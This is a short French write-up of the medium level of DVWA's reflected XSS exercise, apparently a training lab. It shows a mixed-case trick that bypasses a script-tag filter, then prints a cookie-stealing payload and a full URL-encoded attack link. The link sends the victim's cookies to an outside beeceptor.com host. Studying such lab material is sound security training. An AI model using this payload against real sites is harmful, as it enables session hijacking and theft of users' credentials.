Niveau "Medium"
Sur ce nouveau challenge, la saisie utilisateur est réfléchie de la même manière que précédemment :

Je tente à nouveau de faire apparaître une alert()
box :

Les balises <script>
et </script>
semblent avoir été filtrées. Dans un premier temps, je teste des contournement simples :

Un mélange de minuscules/majuscules permet de contourner ce filtre. Une autre possibilité est de considérer que le filtre n'est sans doute pas récursif :

La payload malicieuse de vol de cookie n'est donc que légèrement modifiée pour ce niveau :
<sCriPt>document.write('<img src="https://dvwaxssrefl.free.beeceptor.com?cookie=' + document.cookie + '" />')</script>

Soit l'URL :
http://192.168.56.203:8080/vulnerabilities/xss_r/?name=%3CsCriPt%3Edocument.write%28%27%3Cimg+src%3D%22https%3A%2F%2Fdvwaxssrefl.free.beeceptor.com%3Fcookie%3D%27+%2B+document.cookie+%2B+%27%22+%2F%3E%27%29%3C%2Fscript%3E#
Lorsque la victime visitera note lien, ses cookies seront envoyés sur notre serveur malicieux :

Dernière mise à jour